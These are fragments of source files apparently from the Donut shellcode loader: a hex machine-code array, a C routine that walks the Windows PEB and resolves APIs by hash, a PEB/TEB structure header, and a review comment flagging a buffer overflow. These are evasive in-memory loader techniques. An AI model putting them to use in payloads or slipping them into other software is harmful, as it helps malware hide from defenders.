583 | 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40, | |
584 | 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08, | |
585 | 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b, | |
586 | 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57, | |
587 | 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10, | |
588 | 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83, | |
589 | 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44, | |
590 | 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24, | |
591 | 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00, | |
592 | 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55, | |
593 | 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a, | |
594 | 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50, | |
595 | 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c, | |
596 | 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44, | |
597 | 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15, | |
598 | 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00, | |
599 | 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24, | |
600 | 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b, | |
601 | 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10, | |
602 | 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b, | |
603 | 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5, | |
604 | 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c, | |
605 | 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce, | |
606 | 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08, | |
607 | 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03, | |
608 | 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83, | |
609 | 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3, | |
610 | 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24, | |
611 | 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20, | |
612 | 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89, | |
613 | 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24, | |
614 | 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b, | |
615 | 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3, | |
616 | 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18, | |
617 | 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00, | |
618 | 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08, | |
619 | 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07, | |
620 | 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c, | |
621 | 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24, | |
622 | 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89, | |
623 | 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41, | |
624 | 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a, | |
625 | 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d, | |
626 | 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37, | |
627 | 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34, | |
628 | 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75, | |
629 | 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24, | |
630 | 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d, | |
631 | 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24, | |
632 | 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24, | |
633 | 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01, | |
634 | 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24, | |
635 | 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08, | |
636 | 0x5f, 0xc3}; | |
637 |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // locate address of API in export table using Maru hash function | |
32 | LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){ | |
33 | PIMAGE_DOS_HEADER dos; | |
34 | PIMAGE_NT_HEADERS nt; | |
35 | DWORD i, j, cnt, rva; | |
36 | PIMAGE_DATA_DIRECTORY dir; | |
37 | PIMAGE_EXPORT_DIRECTORY exp; | |
38 | PDWORD adr; | |
39 | PDWORD sym; | |
40 | PWORD ord; | |
41 | PCHAR api, dll, p; | |
42 | LPVOID addr=NULL; | |
43 | ULONG64 dll_hash; | |
44 | CHAR buf[MAX_PATH], dll_name[64], api_name[128]; | |
45 | ||
46 | dos = (PIMAGE_DOS_HEADER)base; | |
47 | nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew); | |
48 | dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory; | |
49 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; | |
50 | ||
51 | // if no export table, return NULL | |
52 | if (rva==0) return NULL; | |
53 | ||
54 | exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva); | |
55 | cnt = exp->NumberOfNames; | |
56 | ||
57 | // if no api names, return NULL | |
58 | if (cnt==0) return NULL; | |
59 | ||
60 | adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions); | |
61 | sym = RVA2VA(PDWORD,base, exp->AddressOfNames); | |
62 | ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals); | |
63 | dll = RVA2VA(PCHAR, base, exp->Name); | |
64 | ||
65 | // get hash of DLL string converted to lowercase | |
66 | for(i=0;dll[i]!=0;i++) { | |
67 | buf[i] = dll[i] | 0x20; | |
68 | } | |
69 | buf[i] = 0; | |
70 | dll_hash = maru(buf, iv); | |
71 | ||
72 | do { | |
73 | // calculate hash of api string | |
74 | api = RVA2VA(PCHAR, base, sym[cnt-1]); | |
75 | // xor with DLL hash and compare with hash to find | |
76 | if ((maru(api, iv) ^ dll_hash) == api_hash) { | |
77 | // return address of function | |
78 | addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]); | |
79 | ||
80 | // is this a forward reference? | |
81 | if ((PBYTE)addr >= (PBYTE)exp && | |
82 | (PBYTE)addr < (PBYTE)exp + | |
83 | dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) | |
84 | { | |
85 | DPRINT("%016llx is forwarded to %s", | |
86 | api_hash, (char*)addr); | |
87 | ||
88 | // copy DLL name to buffer | |
89 | p=(char*)addr; | |
90 | ||
91 | for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) { | |
92 | dll_name[i] = p[i]; | |
93 | if(p[i] == '.') break; | |
94 | } | |
95 | ||
96 | dll_name[i+1] = 'd'; | |
97 | dll_name[i+2] = 'l'; | |
98 | dll_name[i+3] = 'l'; | |
99 | dll_name[i+4] = 0; | |
100 | ||
101 | p += i + 1; | |
102 | ||
103 | // copy API name to buffer | |
104 | for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) { | |
105 | api_name[i] = p[i]; | |
106 | } | |
107 | api_name[i] = 0; | |
108 | ||
109 | DPRINT("Trying to load %s", dll_name); | |
110 | HMODULE hModule = inst->api.LoadLibrary(dll_name); | |
111 | ||
112 | if(hModule != NULL) { | |
113 | DPRINT("Calling GetProcAddress(%s)", api_name); | |
114 | addr = inst->api.GetProcAddress(hModule, api_name); | |
115 | } else addr = NULL; | |
116 | } | |
117 | return addr; | |
118 | } | |
119 | } while (--cnt && addr == NULL); | |
120 | ||
121 | return addr; | |
122 | } | |
123 | ||
124 | // search all modules in the PEB for API | |
125 | LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) { | |
126 | PPEB peb; | |
127 | PPEB_LDR_DATA ldr; | |
128 | PLDR_DATA_TABLE_ENTRY dte; | |
129 | LPVOID addr = NULL; | |
130 | ||
131 | #if defined(_WIN64) | |
132 | peb = (PPEB) __readgsqword(0x60); | |
133 | #else | |
134 | peb = (PPEB) __readfsdword(0x30); | |
135 | #endif | |
136 | ||
137 | ldr = (PPEB_LDR_DATA)peb->Ldr; | |
138 | ||
139 | // for each DLL loaded | |
140 | for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink; | |
141 | dte->DllBase != NULL && addr == NULL; | |
142 | dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink) | |
143 | { | |
144 | // search the export table for api | |
145 | addr = FindExport(inst, dte->DllBase, ulHash, ulIV); | |
146 | } | |
147 | return addr; | |
148 | } |
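Review bot: The forwarder-name copy in FindExport can write one byte past dll_name: the loop bound `i < sizeof(dll_name)-4` lets i reach 60, after which `dll_name[i+4] = 0` indexes element 64 of a 64-byte array, and when the loop ends on NUL or on the bound rather than on '.', dll_name[i] is never assigned, so the name carries an uninitialised byte and `p += i + 1` steps past the terminator. Tightening the bound to `sizeof(dll_name)-5` and adding `if (p[i] != '.') return NULL;` after the loop closes both cases; the forwarder string comes from the export directory of whichever module is being scanned, so it is not data the caller vets. The same unbounded pattern appears in the lowercase copy into buf, which stops only at the DLL name's NUL. Ordinal forwarders of the form `DLL.#n` appear to reach GetProcAddress as a literal string and fail; if that is accepted, a comment saying so would help the next reader.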
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef PEB_H | |
32 | #define PEB_H | |
33 | ||
34 | #include <windows.h> | |
35 | ||
36 | typedef void *PPS_POST_PROCESS_INIT_ROUTINE; | |
37 | ||
38 | typedef struct _LSA_UNICODE_STRING { | |
39 | USHORT Length; | |
40 | USHORT MaximumLength; | |
41 | PWSTR Buffer; | |
42 | } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING; | |
43 | ||
44 | typedef struct _RTL_USER_PROCESS_PARAMETERS { | |
45 | BYTE Reserved1[16]; | |
46 | PVOID Reserved2[10]; | |
47 | UNICODE_STRING ImagePathName; | |
48 | UNICODE_STRING CommandLine; | |
49 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; | |
50 | ||
51 | // PEB defined by rewolf | |
52 | // http://blog.rewolf.pl/blog/?p=573 | |
53 | typedef struct _PEB_LDR_DATA { | |
54 | ULONG Length; | |
55 | BOOL Initialized; | |
56 | LPVOID SsHandle; | |
57 | LIST_ENTRY InLoadOrderModuleList; | |
58 | LIST_ENTRY InMemoryOrderModuleList; | |
59 | LIST_ENTRY InInitializationOrderModuleList; | |
60 | } PEB_LDR_DATA, *PPEB_LDR_DATA; | |
61 | ||
62 | typedef struct _LDR_DATA_TABLE_ENTRY | |
63 | { | |
64 | LIST_ENTRY InLoadOrderLinks; | |
65 | LIST_ENTRY InMemoryOrderLinks; | |
66 | LIST_ENTRY InInitializationOrderLinks; | |
67 | LPVOID DllBase; | |
68 | LPVOID EntryPoint; | |
69 | ULONG SizeOfImage; | |
70 | UNICODE_STRING FullDllName; | |
71 | UNICODE_STRING BaseDllName; | |
72 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; | |
73 | ||
74 | typedef struct _PEB { | |
75 | BYTE InheritedAddressSpace; | |
76 | BYTE ReadImageFileExecOptions; | |
77 | BYTE BeingDebugged; | |
78 | BYTE _SYSTEM_DEPENDENT_01; | |
79 | ||
80 | LPVOID Mutant; | |
81 | LPVOID ImageBaseAddress; | |
82 | ||
83 | PPEB_LDR_DATA Ldr; | |
84 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; | |
85 | LPVOID SubSystemData; | |
86 | LPVOID ProcessHeap; | |
87 | LPVOID FastPebLock; | |
88 | LPVOID _SYSTEM_DEPENDENT_02; | |
89 | LPVOID _SYSTEM_DEPENDENT_03; | |
90 | LPVOID _SYSTEM_DEPENDENT_04; | |
91 | union { | |
92 | LPVOID KernelCallbackTable; | |
93 | LPVOID UserSharedInfoPtr; | |
94 | }; | |
95 | DWORD SystemReserved; | |
96 | DWORD _SYSTEM_DEPENDENT_05; | |
97 | LPVOID _SYSTEM_DEPENDENT_06; | |
98 | LPVOID TlsExpansionCounter; | |
99 | LPVOID TlsBitmap; | |
100 | DWORD TlsBitmapBits[2]; | |
101 | LPVOID ReadOnlySharedMemoryBase; | |
102 | LPVOID _SYSTEM_DEPENDENT_07; | |
103 | LPVOID ReadOnlyStaticServerData; | |
104 | LPVOID AnsiCodePageData; | |
105 | LPVOID OemCodePageData; | |
106 | LPVOID UnicodeCaseTableData; | |
107 | DWORD NumberOfProcessors; | |
108 | union | |
109 | { | |
110 | DWORD NtGlobalFlag; | |
111 | LPVOID dummy02; | |
112 | }; | |
113 | LARGE_INTEGER CriticalSectionTimeout; | |
114 | LPVOID HeapSegmentReserve; | |
115 | LPVOID HeapSegmentCommit; | |
116 | LPVOID HeapDeCommitTotalFreeThreshold; | |
117 | LPVOID HeapDeCommitFreeBlockThreshold; | |
118 | DWORD NumberOfHeaps; | |
119 | DWORD MaximumNumberOfHeaps; | |
120 | LPVOID ProcessHeaps; | |
121 | LPVOID GdiSharedHandleTable; | |
122 | LPVOID ProcessStarterHelper; | |
123 | LPVOID GdiDCAttributeList; | |
124 | LPVOID LoaderLock; | |
125 | DWORD OSMajorVersion; | |
126 | DWORD OSMinorVersion; | |
127 | WORD OSBuildNumber; | |
128 | WORD OSCSDVersion; | |
129 | DWORD OSPlatformId; | |
130 | DWORD ImageSubsystem; | |
131 | DWORD ImageSubsystemMajorVersion; | |
132 | LPVOID ImageSubsystemMinorVersion; | |
133 | union | |
134 | { | |
135 | LPVOID ImageProcessAffinityMask; | |
136 | LPVOID ActiveProcessAffinityMask; | |
137 | }; | |
138 | #ifdef _WIN64 | |
139 | LPVOID GdiHandleBuffer[64]; | |
140 | #else | |
141 | LPVOID GdiHandleBuffer[32]; | |
142 | #endif | |
143 | LPVOID PostProcessInitRoutine; | |
144 | LPVOID TlsExpansionBitmap; | |
145 | DWORD TlsExpansionBitmapBits[32]; | |
146 | LPVOID SessionId; | |
147 | ULARGE_INTEGER AppCompatFlags; | |
148 | ULARGE_INTEGER AppCompatFlagsUser; | |
149 | LPVOID pShimData; | |
150 | LPVOID AppCompatInfo; | |
151 | PUNICODE_STRING CSDVersion; | |
152 | LPVOID ActivationContextData; | |
153 | LPVOID ProcessAssemblyStorageMap; | |
154 | LPVOID SystemDefaultActivationContextData; | |
155 | LPVOID SystemAssemblyStorageMap; | |
156 | LPVOID MinimumStackCommit; | |
157 | } PEB, *PPEB; | |
158 | ||
159 | ||
160 | typedef struct _CLIENT_ID { | |
161 | HANDLE UniqueProcess; | |
162 | HANDLE UniqueThread; | |
163 | } CLIENT_ID, *PCLIENT_ID; | |
164 | ||
165 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME; | |
166 | typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT; | |
167 | typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME; | |
168 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT; | |
169 | ||
170 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { | |
171 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous; | |
172 | PACTIVATION_CONTEXT *ActivationContext; | |
173 | ULONG Flags; | |
174 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME; | |
175 | ||
176 | typedef struct _ACTIVATION_CONTEXT_STACK | |
177 | { | |
178 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; | |
179 | LIST_ENTRY FrameListCache; | |
180 | ULONG Flags; | |
181 | ULONG NextCookieSequenceNumber; | |
182 | ULONG StackId; | |
183 | } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK; | |
184 | #define GDI_BATCH_BUFFER_SIZE 310 | |
185 | ||
186 | typedef struct _GDI_TEB_BATCH | |
187 | { | |
188 | ULONG Offset; | |
189 | ULONG_PTR HDC; | |
190 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; | |
191 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; | |
192 | ||
193 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT | |
194 | { | |
195 | ULONG Flags; | |
196 | PSTR FrameName; | |
197 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; | |
198 | ||
199 | typedef struct _TEB_ACTIVE_FRAME | |
200 | { | |
201 | ULONG Flags; | |
202 | struct _TEB_ACTIVE_FRAME *Previous; | |
203 | PTEB_ACTIVE_FRAME_CONTEXT Context; | |
204 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; | |
205 | ||
206 | #if !defined(_MSC_VER) | |
207 | typedef struct _PROCESSOR_NUMBER { | |
208 | USHORT Group; | |
209 | UCHAR Number; | |
210 | UCHAR Reserved; | |
211 | } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER; | |
212 | #endif | |
213 | ||
// Thread Environment Block as laid out by ntdll (undocumented; this is a
// hand-written mirror). Every member is ABI: the offset of each later field
// depends on the exact size of every earlier one, including the _M_X64 /
// x86 array-length differences, so fields may be renamed but never added,
// removed or reordered. NOTE(review): the TEB layout has changed between
// Windows releases; offsets beyond the early members should be verified
// against the OS build actually targeted before code relies on them.
typedef struct _TEB
{
    NT_TIB NtTib;                          // first member; NT_TIB itself comes from winnt.h

    PVOID EnvironmentPointer;
    CLIENT_ID ClientId;
    PVOID ActiveRpcHandle;
    PVOID ThreadLocalStoragePointer;
    PPEB ProcessEnvironmentBlock;          // NOTE(review): presumably what the loader reads to reach the PEB

    ULONG LastErrorValue;
    ULONG CountOfOwnedCriticalSections;
    PVOID CsrClientThread;
    PVOID Win32ThreadInfo;
    ULONG User32Reserved[26];
    ULONG UserReserved[5];
    PVOID WOW32Reserved;
    LCID CurrentLocale;
    ULONG FpSoftwareStatusRegister;
    PVOID SystemReserved1[54];
    NTSTATUS ExceptionCode;
    PVOID ActivationContextStackPointer;   // presumably a PACTIVATION_CONTEXT_STACK
#ifdef _M_X64
    UCHAR SpareBytes[24];
#else
    UCHAR SpareBytes[36];
#endif
    ULONG TxFsContext;

    GDI_TEB_BATCH GdiTebBatch;             // large inline buffer; see GDI_BATCH_BUFFER_SIZE
    CLIENT_ID RealClientId;
    HANDLE GdiCachedProcessHandle;
    ULONG GdiClientPID;
    ULONG GdiClientTID;
    PVOID GdiThreadLocalInfo;
    ULONG_PTR Win32ClientInfo[62];
    PVOID glDispatchTable[233];
    ULONG_PTR glReserved1[29];
    PVOID glReserved2;
    PVOID glSectionInfo;
    PVOID glSection;
    PVOID glTable;
    PVOID glCurrentRC;
    PVOID glContext;

    NTSTATUS LastStatusValue;
    UNICODE_STRING StaticUnicodeString;
    WCHAR StaticUnicodeBuffer[261];

    PVOID DeallocationStack;
    PVOID TlsSlots[64];
    LIST_ENTRY TlsLinks;

    PVOID Vdm;
    PVOID ReservedForNtRpc;
    PVOID DbgSsReserved[2];

    ULONG HardErrorMode;
#ifdef _M_X64
    PVOID Instrumentation[11];
#else
    PVOID Instrumentation[9];
#endif
    GUID ActivityId;

    PVOID SubProcessTag;
    PVOID EtwLocalData;
    PVOID EtwTraceData;
    PVOID WinSockData;
    ULONG GdiBatchCount;

    // all three views overlay the same 4 bytes
    union
    {
        PROCESSOR_NUMBER CurrentIdealProcessor;
        ULONG IdealProcessorValue;
        struct
        {
            UCHAR ReservedPad0;
            UCHAR ReservedPad1;
            UCHAR ReservedPad2;
            UCHAR IdealProcessor;
        };
    };

    ULONG GuaranteedStackBytes;
    PVOID ReservedForPerf;
    PVOID ReservedForOle;
    ULONG WaitingOnLoaderLock;
    PVOID SavedPriorityState;
    ULONG_PTR SoftPatchPtr1;
    PVOID ThreadPoolData;
    PVOID *TlsExpansionSlots;
#ifdef _M_X64
    PVOID DeallocationBStore;
    PVOID BStoreLimit;
#endif
    ULONG MuiGeneration;
    ULONG IsImpersonating;
    PVOID NlsCache;
    PVOID pShimData;
    ULONG HeapVirtualAffinity;
    HANDLE CurrentTransactionHandle;
    PTEB_ACTIVE_FRAME ActiveFrame;
    PVOID FlsData;

    PVOID PreferredLanguages;
    PVOID UserPrefLanguages;
    PVOID MergedPrefLanguages;
    ULONG MuiImpersonation;

    union
    {
        USHORT CrossTebFlags;
        USHORT SpareCrossTebBits : 16;
    };
    // bit view and whole-word view of the same USHORT
    union
    {
        USHORT SameTebFlags;
        struct
        {
            USHORT SafeThunkCall : 1;
            USHORT InDebugPrint : 1;
            USHORT HasFiberData : 1;
            USHORT SkipThreadAttach : 1;
            USHORT WerInShipAssertCode : 1;
            USHORT RanProcessInit : 1;
            USHORT ClonedThread : 1;
            USHORT SuppressDebugMsg : 1;
            USHORT DisableUserStackWalk : 1;
            USHORT RtlExceptionAttached : 1;
            USHORT InitialThread : 1;
            USHORT SessionAware : 1;
            USHORT SpareSameTebBits : 4;
        };
    };

    PVOID TxnScopeEnterCallback;
    PVOID TxnScopeExitCallback;
    PVOID TxnScopeContext;
    ULONG LockCount;
    ULONG SpareUlong0;
    PVOID ResourceRetValue;
    PVOID ReservedForWdf;
} TEB, *PTEB;
358 | ||
359 | #endif⏎ |
0 | ||
1 | /** | |
2 | Copyright © 2016-2019 Odzhan. All Rights Reserved. | |
3 | ||
4 | Redistribution and use in source and binary forms, with or without | |
5 | modification, are permitted provided that the following conditions are | |
6 | met: | |
7 | ||
8 | 1. Redistributions of source code must retain the above copyright | |
9 | notice, this list of conditions and the following disclaimer. | |
10 | ||
11 | 2. Redistributions in binary form must reproduce the above copyright | |
12 | notice, this list of conditions and the following disclaimer in the | |
13 | documentation and/or other materials provided with the distribution. | |
14 | ||
15 | 3. The name of the author may not be used to endorse or promote products | |
16 | derived from this software without specific prior written permission. | |
17 | ||
18 | THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR | |
19 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
21 | DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
22 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
